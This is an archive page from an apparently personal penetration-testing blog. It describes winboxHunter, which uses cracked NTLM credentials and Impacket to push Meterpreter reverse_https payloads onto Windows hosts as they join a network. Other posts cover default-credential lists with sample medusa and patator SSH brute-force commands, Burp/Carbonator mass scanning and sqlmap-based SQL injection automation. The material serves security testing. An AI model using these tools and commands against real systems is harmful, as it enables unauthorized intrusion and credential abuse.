Archive

Archive for the ‘Penetration Testing’ Category

winboxHunter

August 27, 2014 Leave a comment

Prerequisites:

- Python2.7
– Impacket (svn checkout http://impacket.googlecode.com/svn/trunk/ impacket-read-only)
– Ruby
– Veil Evasion (git clone https://github.com/Veil-Framework/Veil-Evasion.git)

Description:

If you are working on a penetration test remotely, its sometimes hard to determine when the users start work or connect their laptops to the network.

winboxHunter is useful if you have managed to capture and cracked a bunch of NTLM credentails and want to run Metasploit against these windows boxes as and when they are connected to the network.

winboxHunter listens for NBNS broadcast packets so that when a new winBox is connected to the network, it will use the Impacket scripts (psexec.py and wmiexec.py) to push an executable onto the winBox and runs it.

In the background, winboxHunter runs Metasploit with payload handler (multi/handler) and listens for incoming connections from the winboxes.

You might want to modify autorunCmd.rc to specify the Metasploit commands you want to run on the pwned winbox upon connecting back to Metasploit.

See meterpreter.rc and autorunCmd.rc for more details.

If a host changes its IP address due to DHCP lease expiration, it will not attempt to exploit the winbox twice.

Format of password.txt

domain/username password

Instructions:

Meterpreter executable

You only need to use one of the below 2 options

- You can either use your own meterpreter payload executable using the -e or –exe argument (payload=windows/meterpreter/reverse_https, rport=8443) or

- You can use the -n or –enableVeil argument to generate a meterpreter payload executable using Veil Evasion
You can run winboxHunter using the below sample command

ruby winboxHunter.rb -n -f password.txt -v

When you run winboxHunter, a linux screen with the name “msfscreen” will be created and msfconsole will be executed. You can connect to the screen via the below command

screen -dr msfscreen

The source code for winboxHunter can be found at https://github.com/milo2012/winboxHunter

Medusa ‘combo’ word lists (default usernames and passwords) for SSH and Telnet services

August 16, 2014 Leave a comment

Cirt.net is a useful resource that contains the default credentials for various devices.

I wrote a script that crawls, parses and extracts the credentials from cirt.net and outputs them into the “combo” format as required by medusa. Medusa is a brute force tool for numerous services like MySQL, SMB, SSH, Telnet and etc.

Currently, only ssh and telnet related credentials are extracted from cirt.net.

You can download the “combo” word lists for ssh and telnet via the direct links below.

SSH combo list for Medusa

https://github.com/milo2012/pentest_scripts/blob/master/default_accounts_wordlist/wordList_ssh.txt

Telnet combo list for Medusa

https://github.com/milo2012/pentest_scripts/blob/master/default_accounts_wordlist/wordList_telnet.txt

Combined users.txt and passwords.txt that you can use with Patator (https://code.google.com/p/patator/) which is another awesome brute force tool.

Sample command for medusa “combo” SSH attack.
medusa -M ssh -C wordList_ssh.txt -H port22.txt

If you would like to play around with the python script, you can download the file at the below location.

Github

https://github.com/milo2012/pentest_scripts/tree/master/default_accounts_wordlist

Patator is another awesome tool that you can use for brute forcing SSH logins

https://code.google.com/p/patator/

Sample command for patator SSH attack

patator.py ssh_login host=10.0.0.1 user=FILE0 password=FILE1 0=users.txt 1=passwords.txt -x ignore:mesg=’Authentication failed.’

Shoutout

Special shoutout to Cirt.net for maintaining and providing the extensive database of default credentials at cirt.net/passwords

Extended functionality for Burp Plugin – Carbonator

August 4, 2014 8 comments

I wrote a script to extend the functions of Burp plugin – Carbonator.

Carbonator is an awesome script by Integris Security. Carbonator uses Jython which is easy for me to understand.

Its similar to Sodapop by Redspin. However, the Sodapop script seems broken now.

Below is a link to Sodapop by Redspin

http://www.redspin.com/blog/2010/09/20/advanced-burp-suite-automation-2/

Below is a description for Carbonator from their website.
Carbonator’s purpose is to enable the ability to automate the vulnerability scanning of a large number of web applications.
A single command from a command line can now produce volumes of vulnerability information.

Carbonator can be found here

https://www.integrissecurity.com/index.php?resources=Carbonator

Burp Carbonator Extension Mod

I made some additional tweaks to the original carbonator.py script as well as created my own launch_burp.py run script.

The additional functionalities that I have included are
1. Allow you to run Burp/Carbonator against a file containing a list of domain names/IPS/urls. Below is a screenshot of the file format.

Carbonator file input containing domain names/urls/ip

2. Run Bing lookup against the IP address of the domain name and find other websites that are hosted on the same IP address (using the IP:x.x.x.x keyword in Bing) and run Burp/Carbonator against these additional websites. These seems to be some false positives in Bing search engine. The script checks to make sure that the domain name resolves to the same IP address.

3. Search Google for links belonging to the domain name (using the site:domain.com keyword) in Google and run Burp/Carbonator against these links. You might find additional website content/links as compared to crawling http://www.domain.com.

My Github repo for the code is at https//github.com/milo2012/carbonator. Please feel free to send me your feedback/comments. Thank you for reading.

Automating SQL Injection with Burp, Sqlmap and GDS Burp API

June 26, 2012 Leave a comment

I came across GDS Burp API which seems like a very useful tool for parsing Burp Proxy logs.  The GDS Burp API exposes a Python object interface to requests/responses recorded by Burp. The below link provides a very good introduction to the API.

http://blog.gdssecurity.com/labs/2010/8/10/constricting-the-web-the-gds-burp-api.html

I wrote a simple script to use the API to parse the Burp proxy logs and send it to SQLMap to automate testing SQL injection for all GET and POST parameters and skip all urls without any parameters.

1. Clone the GDSSecurity burpee repository git clone https://github.com/GDSSecurity/burpee.git

2. Download burpSQL.py from https://github.com/milo2012/burpSQL into the burpee folder

3. Next, we will have to configure logging in Burpsuite

4. Change the proxy settings of your browser to 127.0.0.1:8080

5. Crawl the website with Owasp Ajax Crawling tool or spider with Burpsuite or the manual way.

Below are the command line options for burpSQL

6. The above is pretty self explanatory.  If your Burp proxy log is cluttered with urls from multiple domains, you can filtered the SQL injection testing to specific domains using the –domain switch.

Drop me a message if you have any suggestions or comments.  Thank you !

OWASP Ajax Crawling Tool (Good Companion Tool to Burpsuite)

December 26, 2011 1 comment

OWASP Ajax Crawling Tool is an awesome companion to the tool Burpsuite. It allows you to crawl ajax websites which is a feature missing from Burpsuite. Both are must have tools for penetration testing of modern Ajax websites.

The official website for ACT is https://www.owasp.org/index.php/OWASP_AJAX_Crawling_Tool

The current version of ACT 0.1a seems to have issues with crawling some Ajax websites due to some issues in the dependencies.

I have submitted the bugfixes to the website but it will take some time for the changes to be committed.

Below shows the screenshots of the results of the crawl before and after the patch.

Before the patch

After the patch
As shown in the below screenshot, extra 4 links were discovered after the patch.

I have also added the function of being able to specify the proxy server via command line mode.

Below is the temporary download link for the ACT if you can’t wait for the changes to be committed at the main site.

https://www.dropbox.com/s/gosq97z5vjlr09f/act-new.jar

Categories: Penetration Testing
Follow

Get every new post delivered to your Inbox.